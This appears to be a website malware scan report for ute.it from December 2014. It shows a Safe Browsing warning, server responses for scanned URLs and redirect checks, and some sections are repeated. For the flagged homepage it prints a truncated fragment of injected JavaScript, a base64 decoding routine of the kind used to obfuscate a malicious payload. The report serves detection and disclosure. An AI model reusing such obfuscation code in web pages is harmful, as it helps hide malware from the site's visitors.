Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ute.it
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ute.it/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 29 Dec 2014 03:05:29 GMT Location: http://www.ute.it/ Server: Apache Content-Length: 226 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.ute.it/ | 200 OK Content-Length: 6139 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function base64decode(str){var b64chars='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg' 'hijklmnopqrstuvwxyz0123456789 /=';var b64decoded='';var chr1,chr2,chr3;var enc1,enc2,enc3,enc4;str=str.replace(/[^a-z0-9 /=]/gi,'');for(var i=0;i<str.length;){enc1=b64chars.indexOf(str.charAt(i ));enc2=b64chars.indexOf(str.charAt(i ));enc3=b64chars.indexOf(str.charAt(i ));enc4=b64chars.indexOf(str.charAt(i ));chr1=(enc1<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)< Antivirus reports:
| ||
http://www.ute.it/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ute.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Dec 2014 03:05:29 GMT
Location: http://www.ute.it/
Server: Apache
Content-Length: 226
Content-Type: text/html; charset=iso-8859-1
...226 bytes of data.
GET / HTTP/1.1
Host: ute.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Dec 2014 03:05:29 GMT
Location: http://www.ute.it/
Server: Apache
Content-Length: 226
Content-Type: text/html; charset=iso-8859-1
...226 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ute.it
Referer: http://www.google.com/search?q=ute.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ute.it
Referer: http://www.google.com/search?q=ute.it
Result:
The result is similar to the first query. There are no suspicious redirects found.